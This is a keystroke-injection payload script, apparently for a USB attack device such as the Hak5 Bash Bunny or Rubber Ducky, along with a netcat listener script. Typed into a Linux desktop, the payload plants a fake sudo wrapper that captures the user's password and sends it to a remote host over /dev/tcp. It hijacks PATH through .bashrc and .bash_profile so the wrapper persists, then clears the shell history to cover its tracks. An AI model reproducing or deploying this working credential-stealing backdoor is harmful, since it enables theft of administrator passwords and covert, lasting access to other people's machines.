1.6 KiB
1.6 KiB
Payload originally designed by oXis for Bash Bunny.
Bash Bunny Payload page: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor
Change example.com to your own domain or listening IP address and 1337 to your own port of choice.
REM Original Author: oXis
REM Modified by 5h@d0w
DELAY 2000
GUI space
DELAY 500
ALT F2
DELAY 500
BACKSPACE
DELAY 100
STRING terminal
ENTER
DELAY 3000
STRING mkdir -p ~/.config/sudo
ENTER
DELAY 100
STRING rm ~/.config/sudo/sudo
ENTER
DELAY 100
STRING echo '#!/bin/bash
ENTER
STRING /usr/bin/sudo -n true 2>/dev/null
ENTER
STRING if [ $? -eq 0 ]
ENTER
STRING then
ENTER
STRING /usr/bin/sudo $@
ENTER
STRING else
ENTER
STRING echo -n "[sudo] password for $USER: "
ENTER
STRING read -s pwd
ENTER
STRING echo
ENTER
STRING echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
ENTER
STRING if [ $? -eq 1 ]
ENTER
STRING then
ENTER
STRING echo "$USER:$pwd:invalid" > /dev/tcp/example.com/1337
ENTER
STRING echo "Sorry, try again."
ENTER
STRING sudo $@
ENTER
STRING else
ENTER
STRING echo "$USER:$pwd:valid" > /dev/tcp/example.com/1337
ENTER
STRING echo "$pwd" | /usr/bin/sudo -S $@
ENTER
STRING fi
ENTER
STRING fi' > ~/.config/sudo/sudo
ENTER
DELAY 600
STRING chmod u+x ~/.config/sudo/sudo
ENTER
DELAY 800
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
ENTER
DELAY 500
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
ENTER
DELAY 500
STRING history -c && rm .bash_history && exit
ENTER
DELAY 1000
GUI q
Use this bash script to listen on your server:
#!/bin/bash
while [ true ]
do
netcat -vv -lp 1337 >> passwd.txt
done